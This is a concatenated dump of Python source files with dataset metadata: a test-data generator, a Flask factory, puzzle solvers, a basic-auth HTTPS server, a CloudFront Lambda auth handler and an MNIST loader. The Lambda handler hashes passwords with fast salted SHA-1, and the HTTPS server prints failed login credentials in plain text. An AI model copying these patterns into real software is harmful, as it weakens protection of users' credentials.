| 32.090909 | 80 | 0.430595 | 227 | 1,765 | 3.303965 | 0.255507 | 0.037333 | 0.093333 | 0.053333 | 0.381333 | 0.310667 | 0.273333 | 0.273333 | 0.273333 | 0.273333 | 0 | 0.014384 | 0.172805 | 1,765 | 54 | 81 | 32.685185 | 0.499315 | 0.388669 | 0 | 0.416667 | 0 | 0 | 0.062344 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb9f2ac1408c2f916e30ffa4b8d707e4f3ab1eff | 2,281 | py | Python | config/scripts/dados-pygen/models.py | uhndev/hateoas-server | 7eac7928b9fb3be2ffcd9ec1eb833ba533333e98 | [
"Unlicense",
"MIT"
] | null | null | null | config/scripts/dados-pygen/models.py | uhndev/hateoas-server | 7eac7928b9fb3be2ffcd9ec1eb833ba533333e98 | [
"Unlicense",
"MIT"
] | null | null | null | config/scripts/dados-pygen/models.py | uhndev/hateoas-server | 7eac7928b9fb3be2ffcd9ec1eb833ba533333e98 | [
"Unlicense",
"MIT"
] | null | null | null | import random
import config
from faker import Factory
fake = Factory.create()
class User:
def __init__(self):
self.username = fake.user_name()
self.email = fake.company_email()
self.firstName = fake.first_name()
self.lastName = fake.last_name()
self.dateOfBirth = fake.iso8601()
self.password = "Password123"
self.prefix = random.choice(['Mr.', 'Mrs.', 'Ms.', 'Dr.'])
self.gender = random.choice(['Male', 'Female'])
self.group = 'coordinator'
class Study:
def __init__(self, id):
self.id = id
        self.name = 'STUDY-' + str(id) + '-' + fake.word().upper()
self.attributes = {}
self.attributes['procedure'] = fake.words()
self.attributes['area'] = ['BOTH', 'LEFT', 'RIGHT']
        self.reb = fake.country_code() + '-' + str(random.randint(100, 999))
self.administrator = random.randint(config.minCoord, config.maxCoord - 1)
self.pi = random.randint(config.minCoord, config.maxCoord - 1)
class CollectionCentre:
def __init__(self, id, study):
self.id = id
        self.name = 'CC-' + str(id) + '-' + fake.city()
self.study = study.id
self.contact = random.randint(config.minCoord, config.maxCoord - 1)
class UserEnrollment:
def __init__(self, id, centreID):
self.collectionCentre = centreID
self.user = random.randint(config.minCoord, config.maxCoord - 1)
self.centreAccess = random.choice(['coordinator', 'interviewer'])
class SubjectEnrollment:
def __init__(self, id, study, centreID):
# subject user info
self.username = fake.user_name()
self.email = fake.company_email()
self.firstname = fake.first_name()
self.lastname = fake.last_name()
self.dob = fake.iso8601()
self.password = "Password123"
self.prefix = random.choice(['Mr.', 'Mrs.', 'Ms.', 'Dr.'])
self.gender = random.choice(['Male', 'Female'])
# subject enrollment info
self.study = study.id
self.collectionCentre = centreID
self.doe = fake.iso8601()
self.studyMapping = {}
        for key, values in study.attributes.items():
self.studyMapping[key] = random.choice(values)
self.status = random.choice([
'REGISTERED',
'ONGOING',
'LOST TO FOLLOWUP',
'WITHDRAWN',
'INELIGIBLE',
'DECEASED',
'TERMINATED',
'COMPLETED'
])
| 31.246575 | 77 | 0.644454 | 265 | 2,281 | 5.437736 | 0.335849 | 0.058293 | 0.038168 | 0.036086 | 0.48161 | 0.406662 | 0.406662 | 0.406662 | 0.277585 | 0.277585 | 0 | 0.015317 | 0.198597 | 2,281 | 72 | 78 | 31.680556 | 0.772976 | 0.017975 | 0 | 0.258065 | 0 | 0 | 0.097452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.032258 | 0.048387 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cba3386606abea1e2c3dfe0f137338d796e10c89 | 539 | py | Python | batuta/base.py | makecodes/batuta | b460bdb216e0d9486dacab3273b891d7515287c3 | [
"Unlicense"
] | null | null | null | batuta/base.py | makecodes/batuta | b460bdb216e0d9486dacab3273b891d7515287c3 | [
"Unlicense"
] | 2 | 2022-01-22T15:17:15.000Z | 2022-01-22T16:08:27.000Z | batuta/base.py | makecodes/batuta | b460bdb216e0d9486dacab3273b891d7515287c3 | [
"Unlicense"
] | null | null | null | from dynaconf import FlaskDynaconf
from flask import Flask
def create_app(**config):
app = Flask(__name__)
FlaskDynaconf(app) # config managed by Dynaconf
app.config.load_extensions('EXTENSIONS') # Load extensions from settings.toml
app.config.update(config) # Override with passed config
return app
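# create_app is a Flask application factory; keyword overrides are applied
# last, so (illustrative): app = create_app(DEBUG=True)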
def create_app_wsgi():
# workaround for Flask issue
# that doesn't allow **config
# to be passed to create_app
# https://github.com/pallets/flask/issues/4170
app = create_app()
return app
| 26.95 | 82 | 0.714286 | 72 | 539 | 5.208333 | 0.513889 | 0.096 | 0.064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009302 | 0.202226 | 539 | 19 | 83 | 28.368421 | 0.862791 | 0.400742 | 0 | 0.181818 | 0 | 0 | 0.031746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
cbaf10d4a0aa43c5e434d348b34679078fdc57a8 | 1,475 | py | Python | python/euler002/euler002.py | marvins/ProjectEuler | 55a377bb9702067bac6908c1316c578498402668 | [
"MIT"
] | null | null | null | python/euler002/euler002.py | marvins/ProjectEuler | 55a377bb9702067bac6908c1316c578498402668 | [
"MIT"
] | null | null | null | python/euler002/euler002.py | marvins/ProjectEuler | 55a377bb9702067bac6908c1316c578498402668 | [
"MIT"
] | 1 | 2020-12-16T09:25:19.000Z | 2020-12-16T09:25:19.000Z | #!/usr/bin/env python
#---------------------------------#
#- Fibonacci Lookup Table -#
#---------------------------------#
fib_table = {0:0, 1:1, 2:1, 3:2}
#---------------------------------#
#- Compute Fibonacci Value -#
#---------------------------------#
def Fibonacci( F ):
# Check exit
if F < 2:
return F
# Check for item already answered
if F in fib_table:
return fib_table[F]
# Otherwise, update the table
fib_table[F] = Fibonacci(F-1) + Fibonacci(F-2)
# Return
return fib_table[F]
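# Memoization note: fib_table caches every computed value, so each Fibonacci
# number is computed once; later lookups are O(1), though recursion depth
# still grows linearly with F.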
#----------------------------------#
#- Find Max Fibonacci Value -#
#----------------------------------#
def Find_Max_Fibonacci( max_value ):
# Iterate until you hit the max
counter = 2
Fmax = counter
while True:
# Update Fmax
Fmax = counter-1
# Check Fibonacci
if Fibonacci(counter) >= max_value:
return Fmax
# Increment
counter += 1
#--------------------------#
#- Main Function -#
#--------------------------#
def main():
# Max value
max_value = 4000000
# Find the Max Fib Number
Fmax = Find_Max_Fibonacci(max_value)
# Iterate
result = 0
for x in xrange(0,Fmax+1):
# Compute value
value = Fibonacci(x)
# Check if even
if value % 2 == 0:
result += value
print result
if __name__ == '__main__':
main()
| 19.666667 | 50 | 0.44 | 151 | 1,475 | 4.15894 | 0.324503 | 0.063694 | 0.042994 | 0.047771 | 0.098726 | 0.098726 | 0 | 0 | 0 | 0 | 0 | 0.025341 | 0.304407 | 1,475 | 74 | 51 | 19.932432 | 0.586745 | 0.425085 | 0 | 0.074074 | 0 | 0 | 0.009901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cbb30457af6425432e38e401ec2a806f28ae68ab | 6,968 | py | Python | SimpleHTTPSAuthServer.py | oza6ut0ne/SimpleHTTPSAuthServer | 084e5c0cb686e8c41ba1f911a6bc8939f2e24a59 | [
"MIT"
] | null | null | null | SimpleHTTPSAuthServer.py | oza6ut0ne/SimpleHTTPSAuthServer | 084e5c0cb686e8c41ba1f911a6bc8939f2e24a59 | [
"MIT"
] | null | null | null | SimpleHTTPSAuthServer.py | oza6ut0ne/SimpleHTTPSAuthServer | 084e5c0cb686e8c41ba1f911a6bc8939f2e24a59 | [
"MIT"
] | null | null | null | import base64
import os
import random
import re
import socket
import sys
import ssl
import string
if sys.version_info[0] == 2:
from BaseHTTPServer import HTTPServer as Server
from SimpleHTTPServer import SimpleHTTPRequestHandler as Handler
from SocketServer import ThreadingMixIn
from httplib import UNAUTHORIZED
from itertools import izip_longest as zip_longest
elif sys.version_info[0] == 3:
from http.server import HTTPServer as Server
from http.server import SimpleHTTPRequestHandler as Handler
from socketserver import ThreadingMixIn
from http.client import UNAUTHORIZED
from itertools import zip_longest
ENV_USERS = 'SIMPLE_HTTPS_USERS'
ENV_PASSWORDS = 'SIMPLE_HTTPS_PASSWORDS'
ENV_KEYS = 'SIMPLE_HTTPS_KEYS'
class AuthHandler(Handler):
def send_auth_request(self):
self.send_response(UNAUTHORIZED)
self.send_header('WWW-Authenticate', 'Basic realm=\"Authorization Required\"')
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
if not self.server.keys:
if __name__ == '__main__':
Handler.do_GET(self)
return True
auth_header = self.headers.get('Authorization')
if auth_header is None:
self.send_auth_request()
self.wfile.write('<h1>Authorization Required</h1>'.encode())
print('no auth header received')
return False
elif auth_header[len('Basic '):] in self.server.keys:
if __name__ == '__main__':
Handler.do_GET(self)
return True
else:
self.send_auth_request()
self.wfile.write('<h1>Authorization Required</h1>'.encode())
auth = re.sub('^Basic ', '', auth_header)
print('Authentication failed! %s' % base64.b64decode(auth).decode())
return False
def super_get(self):
Handler.do_GET(self)
class HTTPSAuthServer(Server):
def __init__(self, server_address, RequestHandlerClass=AuthHandler,
bind_and_activate=True):
Server.__init__(
self, server_address, RequestHandlerClass, bind_and_activate)
self.keys = []
self.servercert = None
self.cacert = None
self.protocol = 'HTTP'
self.certreqs = ssl.CERT_NONE
def set_auth(self, users=None, passwords=None, keys=None):
if not (users or passwords or keys):
self.keys = []
return
if keys is not None:
self.keys += keys
if users is not None or passwords is not None:
accounts = zip_longest(
users or [''], passwords or [''], fillvalue=''
)
for user, password in accounts:
self.keys.append(
base64.b64encode((user + ':' + password).encode()).decode()
)
def set_certs(self, servercert=None, cacert=None):
self.servercert = servercert
self.cacert = cacert
if servercert is not None:
self.protocol = 'HTTPS'
if cacert is not None:
self.certreqs = ssl.CERT_REQUIRED
self.socket = ssl.wrap_socket(self.socket, certfile=servercert,
server_side=True,
cert_reqs=self.certreqs,
ca_certs=self.cacert)
def server_bind(self):
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
        except (AttributeError, OSError):
            # dual-stack toggle unsupported on this platform; keep the default
            pass
return Server.server_bind(self)
def serve_forever(self, poll_interval=0.5):
if self.servercert is None:
print('No server certificate is specified. HTTPS is disabled.')
elif self.cacert is not None:
print('CA certificate is specified. '
                  'Client certificate authentication is enabled.')
sockname = self.socket.getsockname()
print('Serving {} on {} port {} ...'.format(
self.protocol, sockname[0], sockname[1])
)
try:
Server.serve_forever(self, poll_interval)
except KeyboardInterrupt:
pass
class ThreadedHTTPSAuthServer(ThreadingMixIn, HTTPSAuthServer):
daemon_threads = True
def serve_https(bind=None, port=8000, users=None, passwords=None, keys=None,
servercert=None, cacert=None, threaded=False,
HandlerClass=AuthHandler):
if threaded:
ServerClass = ThreadedHTTPSAuthServer
else:
ServerClass = HTTPSAuthServer
addrinfo = socket.getaddrinfo(
bind, port, 0, socket.SOCK_STREAM, 0, socket.AI_PASSIVE)[0]
ServerClass.address_family = addrinfo[0]
addr = addrinfo[4]
server = ServerClass(addr, HandlerClass)
server.set_auth(users, passwords, keys)
server.set_certs(servercert, cacert)
server.serve_forever()
def random_string(length):
return ''.join([random.choice(
string.ascii_letters +
string.digits +
string.punctuation) for i in range(length)])
def split_or_none(val):
if val is None:
return None
return val.split(' ')
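# A hypothetical programmatic use (certificate path is a placeholder):
# serve_https(bind="0.0.0.0", port=8443, users=["alice"], passwords=["secret"],
#             servercert="server.pem", threaded=True)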
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='An HTTPS server with Basic authentication '
'and client certificate authentication',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('port', nargs='?', type=int, default=8000)
parser.add_argument('-b', '--bind', metavar='ADDRESS')
parser.add_argument('-t', '--threaded', action='store_true')
parser.add_argument('-u', '--users', nargs='*',
default=split_or_none(os.getenv(ENV_USERS)))
parser.add_argument('-p', '--passwords', nargs='*',
default=split_or_none(os.getenv(ENV_PASSWORDS)))
parser.add_argument('-k', '--keys', nargs='*',
default=split_or_none(os.getenv(ENV_KEYS)))
parser.add_argument('-r', '--random', type=int)
parser.add_argument('-s', '--servercert')
parser.add_argument('-c', '--cacert')
parser.add_argument('-d', '--docroot')
args = parser.parse_args()
if args.servercert is not None:
args.servercert = os.path.abspath(args.servercert)
if args.cacert is not None:
args.cacert = os.path.abspath(args.cacert)
if args.docroot is not None:
print('Set docroot to %s' % args.docroot)
os.chdir(args.docroot)
if args.random is not None:
args.users = [random_string(args.random)]
args.passwords = [random_string(args.random)]
print('Generated username and password -> {} : {}'.format(
args.users[0], args.passwords[0])
)
serve_https(args.bind, args.port, args.users, args.passwords,
args.keys, args.servercert, args.cacert, args.threaded)
| 33.5 | 86 | 0.617681 | 784 | 6,968 | 5.330357 | 0.256378 | 0.011965 | 0.021536 | 0.01364 | 0.194783 | 0.131132 | 0.116774 | 0.116774 | 0.092367 | 0.054559 | 0 | 0.008146 | 0.277698 | 6,968 | 207 | 87 | 33.661836 | 0.822174 | 0 | 0 | 0.130952 | 0 | 0 | 0.102899 | 0.006171 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065476 | false | 0.107143 | 0.113095 | 0.005952 | 0.255952 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
cbb79607ab88cfb6b0f8cd6f2a609f20a5508f65 | 867 | py | Python | app/helpers.py | QwertygidQ/phystech-backend | 657a5862d3bab91623551c7f4f6868cfdb1df4b8 | [
"MIT"
] | null | null | null | app/helpers.py | QwertygidQ/phystech-backend | 657a5862d3bab91623551c7f4f6868cfdb1df4b8 | [
"MIT"
] | null | null | null | app/helpers.py | QwertygidQ/phystech-backend | 657a5862d3bab91623551c7f4f6868cfdb1df4b8 | [
"MIT"
] | null | null | null | from flask import request, jsonify
from functools import wraps
from schema import SchemaError
def json_required(func):
@wraps(func)
def wrapper(*args, **kwargs):
if not request.data or not request.json:
return jsonify({
'status': 'Error',
'reason': 'No JSON provided'
})
return func(*args, **kwargs)
return wrapper
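# A hypothetical route using these decorators together (app and item_schema
# are assumed to exist; validate_schema is defined just below):
# @app.route('/items', methods=['POST'])
# @json_required
# @validate_schema(item_schema)
# def create_item():
#     ...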
def validate_schema(schema):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
schema.validate(request.json)
except SchemaError:
return jsonify({
'status': 'Error',
'reason': 'Invalid JSON provided'
})
return func(*args, **kwargs)
return wrapper
return decorator | 25.5 | 53 | 0.517878 | 81 | 867 | 5.518519 | 0.382716 | 0.089485 | 0.058166 | 0.071588 | 0.483221 | 0.348993 | 0.348993 | 0.201342 | 0 | 0 | 0 | 0 | 0.388697 | 867 | 34 | 54 | 25.5 | 0.843396 | 0 | 0 | 0.518519 | 0 | 0 | 0.081797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.185185 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
cbbf46aa2d552297fb3fb4b62e94db053b8ce1eb | 1,581 | py | Python | basic_auth/handler.py | andrei-shabanski/s3pypi | 48718149cf43d6e3252712d072d5b0de850bac55 | [
"MIT"
] | 249 | 2016-04-07T08:36:44.000Z | 2021-06-03T06:55:08.000Z | basic_auth/handler.py | andrei-shabanski/s3pypi | 48718149cf43d6e3252712d072d5b0de850bac55 | [
"MIT"
] | 58 | 2016-06-08T22:41:18.000Z | 2021-05-28T20:03:39.000Z | basic_auth/handler.py | AstrocyteResearch/s3pypi | cd8d02015772dcded3b3db1a588c89e174d10471 | [
"MIT"
] | 100 | 2016-06-23T23:28:23.000Z | 2021-03-12T15:09:29.000Z | import base64
import hashlib
import json
import logging
from dataclasses import dataclass
import boto3
log = logging.getLogger()
region = "us-east-1"
def handle(event: dict, context):
request = event["Records"][0]["cf"]["request"]
try:
authenticate(request["headers"])
except Exception as e:
log.error(repr(e))
return unauthorized
return request
def authenticate(headers: dict):
domain = headers["host"][0]["value"]
auth = headers["authorization"][0]["value"]
auth_type, creds = auth.split(" ")
if auth_type != "Basic":
raise ValueError("Invalid auth type: " + auth_type)
username, password = base64.b64decode(creds).decode().split(":")
user = get_user(domain, username)
if hash_password(password, user.password_salt) != user.password_hash:
raise ValueError("Invalid password for " + username)
@dataclass
class User:
username: str
password_hash: str
password_salt: str
def get_user(domain: str, username: str) -> User:
data = boto3.client("ssm", region_name=region).get_parameter(
Name=f"/s3pypi/{domain}/users/{username}",
WithDecryption=True,
)["Parameter"]["Value"]
return User(username, **json.loads(data))
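# The SSM parameter is expected to hold JSON shaped like
# {"password_hash": "...", "password_salt": "..."} (inferred from the User
# dataclass fields above).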
def hash_password(password: str, salt: str) -> str:
return hashlib.sha1((password + salt).encode()).hexdigest()
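# Illustrative only: hash_password("secret", "salt") is the hex SHA-1 digest
# of the concatenation "secretsalt"; stored hashes must be produced the same way.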
unauthorized = dict(
status="401",
statusDescription="Unauthorized",
headers={
"www-authenticate": [
{"key": "WWW-Authenticate", "value": 'Basic realm="Login"'}
]
},
)
| 23.597015 | 73 | 0.648956 | 181 | 1,581 | 5.596685 | 0.441989 | 0.031589 | 0.019743 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013546 | 0.206199 | 1,581 | 66 | 74 | 23.954545 | 0.793626 | 0 | 0 | 0 | 0 | 0 | 0.145478 | 0.020873 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.145833 | 0.125 | 0.020833 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
cbc875e1529c951ebc046e3930e392b9612e4907 | 1,302 | py | Python | study/hfppnetwork/hfppnetwork/sms/logginghelper.py | NASA-Tournament-Lab/CoECI-CMS-Healthcare-Fraud-Prevention | 4facd935920e77239c25323ca7e233cb899ba9f5 | [
"Apache-2.0"
] | 7 | 2015-07-15T06:47:16.000Z | 2020-10-17T20:51:09.000Z | study/hfppnetwork/hfppnetwork/sms/logginghelper.py | NASA-Tournament-Lab/CoECI-CMS-Healthcare-Fraud-Prevention | 4facd935920e77239c25323ca7e233cb899ba9f5 | [
"Apache-2.0"
] | null | null | null | study/hfppnetwork/hfppnetwork/sms/logginghelper.py | NASA-Tournament-Lab/CoECI-CMS-Healthcare-Fraud-Prevention | 4facd935920e77239c25323ca7e233cb899ba9f5 | [
"Apache-2.0"
] | 8 | 2017-01-30T02:27:01.000Z | 2021-04-21T04:15:48.000Z | # -*- coding: utf-8 -*-
"""
Copyright (C) 2013 TopCoder Inc., All Rights Reserved.
This is the module that defines logging helper methods
This module resides in Python source file logginghelper.py
Thread Safety:
It is thread safe because no module-level variable is used.
@author: TCSASSEMBLER
@version: 1.0
"""
import logging
def method_enter(logger, signature, params=None):
"""
    This function logs entry into a method.
@param signature the method signature
@param params the method params
"""
logger.debug('Entering method %s', signature)
logger.debug('Input parameters:[%s]',('' if params is None else params))
def method_exit(logger, signature, ret=None):
"""
    This function logs exit from a method.
@param signature the method signature
@param ret the method return value
"""
logger.debug('Exiting method %s', signature)
logger.debug('Output parameters:%s',ret)
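# Typical use inside an instrumented function (sketch; the signature string
# is arbitrary):
# method_enter(logger, "MyClass.run", params={"x": 1})
# ... do work ...
# method_exit(logger, "MyClass.run", ret=True)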
def method_error(logger, signature, details):
"""
    This function logs when an error occurs.
@param signature the method signature
@param details the error details
"""
logger.error('Error in method %s', signature)
logger.error('Details:%s',details)
#log error stack
logger.exception('') | 31.756098 | 76 | 0.69278 | 173 | 1,302 | 5.196532 | 0.416185 | 0.050056 | 0.046719 | 0.060067 | 0.309232 | 0.249166 | 0.208009 | 0.077864 | 0 | 0 | 0 | 0.006783 | 0.207373 | 1,302 | 41 | 77 | 31.756098 | 0.864341 | 0.529186 | 0 | 0 | 0 | 0 | 0.202703 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cbca5e82b89e8b333ac4997324a7acc5ec0553d9 | 2,566 | py | Python | hw8/next_permutation.py | alexander-paskal/ece143-hw | 9e3d475cb44fd16f87879cb74dc9305d70805355 | [
"MIT"
] | 1 | 2022-02-02T07:30:20.000Z | 2022-02-02T07:30:20.000Z | hw8/next_permutation.py | alexander-paskal/ece143-hw | 9e3d475cb44fd16f87879cb74dc9305d70805355 | [
"MIT"
] | null | null | null | hw8/next_permutation.py | alexander-paskal/ece143-hw | 9e3d475cb44fd16f87879cb74dc9305d70805355 | [
"MIT"
] | null | null | null | """
Given a permutation of any length, generate the next permutation in lexicographic order.
For example, this are the permutations for [1,2,3] in lexicographic order.
# >>> list(it.permutations([1,2,3]))
[(1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1), (3, 1, 2), (3, 2, 1)]
Then, your function next_permutation(t:tuple)->tuple should do the following
# >>> next_permutation((2,3,1))
(3,1,2)
Because (3,1,2) is the next permutation in lexicographic order. Here is another example:
# >>> next_permutation((0, 5, 2, 1, 4, 7, 3, 6))
(0, 5, 2, 1, 4, 7, 6, 3)
Your function should work for very long input tuples so the autograder will time-out if you
try to brute-force your solution. The last permutation should wrap around to the first.
# >>> next_permutation((3,2,1,0))
(0, 1, 2, 3)
"""
def next_permutation(t: tuple) -> tuple:
"""
    Returns the permutation immediately following t in lexicographic order
    :param t: input permutation as a tuple of distinct ints
    :return: the next permutation as a tuple
"""
assert isinstance(t, tuple)
for elem in t:
assert isinstance(elem, int)
assert len(t) == len(set(t))
RIGHT = -1
LEFT = RIGHT - 1
left = t[LEFT]
right = t[RIGHT]
while True:
if left < right:
            if RIGHT == -1:  # ascent at the last two positions: just swap them
l = list()
l.extend(t[:LEFT])
l.append(t[RIGHT])
l.append(t[LEFT])
return tuple(l)
else:
                # pick the smallest suffix element greater than `left`,
                # then append the remaining suffix elements in sorted order
l = list()
l.extend(t[:LEFT])
remaining = sorted(t[LEFT:])
second_highest = remaining.pop(remaining.index(left) + 1)
l.append(second_highest)
l.extend(sorted(remaining))
return tuple(l)
else: # left > right
try:
RIGHT -= 1
LEFT = RIGHT - 1
left = t[LEFT]
right = t[RIGHT]
except IndexError: # fully reversed list, return start condition
return tuple(sorted(t))
if __name__ == '__main__':
from itertools import permutations
##### Arguments
p = (1,2,3,4,5)
##### End Arguments
ps = permutations(p)
print("Start permutation:", p)
print("\nExpected | Actual | Matching")
print("-"*20)
for i in range(10):
p_n = next(ps)
print(p, p_n, p==p_n)
p = next_permutation(p)
| 27.591398 | 96 | 0.537412 | 347 | 2,566 | 3.919308 | 0.337176 | 0.088235 | 0.013235 | 0.008824 | 0.189706 | 0.151471 | 0.052941 | 0.052941 | 0.052941 | 0.052941 | 0 | 0.042478 | 0.339439 | 2,566 | 92 | 97 | 27.891304 | 0.759882 | 0.420109 | 0 | 0.318182 | 1 | 0 | 0.039528 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 1 | 0.022727 | false | 0 | 0.022727 | 0 | 0.113636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cbcfd99b4f40fab95fa519c4f1885786acde8bae | 2,373 | py | Python | sylwek/data_provider.py | fizykpl/Synerise2 | baf755004d62b3d14a0988bbe8a5add15f10d066 | [
"MIT"
] | null | null | null | sylwek/data_provider.py | fizykpl/Synerise2 | baf755004d62b3d14a0988bbe8a5add15f10d066 | [
"MIT"
] | null | null | null | sylwek/data_provider.py | fizykpl/Synerise2 | baf755004d62b3d14a0988bbe8a5add15f10d066 | [
"MIT"
] | null | null | null | import time
import numpy as np
from matplotlib import pyplot as plt
from sylwek.similarity_measure import SimilarityMeasure
from utils import mnist_reader
class DataProvider:
images = {}
labels = {}
similarity_measure = None
    next_id = -1  # TODO 2. Give every image a unique identifier image_id (e.g. the array index)
def __init__(self):
print("Init: Data Provider.")
self.similarity_measure = SimilarityMeasure(self.images)
# load data
X_train, y_train = mnist_reader.load_mnist('../data/fashion', kind='train')
X_test, y_test = mnist_reader.load_mnist('../data/fashion', kind='t10k')
# Add images and labels
self.add_image(X_train,y_train)
self.add_image(X_test,y_test)
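        # Fashion-MNIST ships 60,000 training and 10,000 test images, so the
        # two add_image calls above assign sequential ids 0..69999.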
def get_image(self,image_id):
if image_id in self.images:
return self.images[image_id]
else:
return None
def add_image(self, images,labels):
if not len(images) == len(labels):
print("Images and labels must be the same size")
print(" System Exit -1")
exit(-1)
for index,image in enumerate(images):
id = self._next_id()
self.images[id] = image
self.add_label(id, labels[index])
def add_label(self,id,label):
if label in self.labels:
self.labels[label].append(id)
else:
self.labels[label] = []
self.labels[label].append(id)
def _next_id(self):
"""
        2. Give every image a unique identifier image_id (e.g. the array index)
:return: next id
"""
self.next_id += 1
return self.next_id
def show_image(self,image_id):
"""
        3. Treat each image as a 784-element (28x28) vector
:param image_id: id of image
"""
data = self.images[image_id]
data = np.resize(data, (28, 28))
plt.imshow(data)
plt.show()
if __name__ == "__main__":
dp = DataProvider()
exetime = int(round(time.time() * 1000))
id = 50
mi = dp.similarity_measure.most_similar(id, 3)
exetime = int(round(time.time() * 1000)) - exetime
print("total time {}[ms]".format( exetime))
print(mi)
# Show
dp.show_image(id)
for id in mi:
dp.show_image(id)
| 28.939024 | 115 | 0.604298 | 310 | 2,373 | 4.451613 | 0.319355 | 0.050725 | 0.021739 | 0.028986 | 0.228986 | 0.195652 | 0.156522 | 0.105797 | 0.105797 | 0.105797 | 0 | 0.018311 | 0.286557 | 2,373 | 81 | 116 | 29.296296 | 0.79681 | 0.142014 | 0 | 0.107143 | 0 | 0 | 0.070086 | 0 | 0 | 0 | 0 | 0.012346 | 0 | 1 | 0.107143 | false | 0 | 0.089286 | 0 | 0.339286 | 0.089286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cbdf9ff14b79b043642bf4e92833f21eebe9c6f0 | 621 | py | Python | build_automation/content_management/migrations/0046_auto_20200228_1432.py | SolarSPELL-Main/DLMS | 7e799246c55f5a64fa236567c411d1c2a2c4f38f | [
"MIT"
] | null | null | null | build_automation/content_management/migrations/0046_auto_20200228_1432.py | SolarSPELL-Main/DLMS | 7e799246c55f5a64fa236567c411d1c2a2c4f38f | [
"MIT"
] | 9 | 2020-01-15T21:33:16.000Z | 2021-06-10T22:13:28.000Z | build_automation/content_management/migrations/0046_auto_20200228_1432.py | SolarSPELL-Main/DLMS | 7e799246c55f5a64fa236567c411d1c2a2c4f38f | [
"MIT"
] | 3 | 2019-11-16T03:54:48.000Z | 2021-09-10T18:53:20.000Z | # Generated by Django 2.1.3 on 2020-02-28 21:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('content_management', '0045_auto_20200228_1345'),
]
operations = [
migrations.RemoveField(
model_name='content',
name='collections',
),
migrations.AddField(
model_name='content',
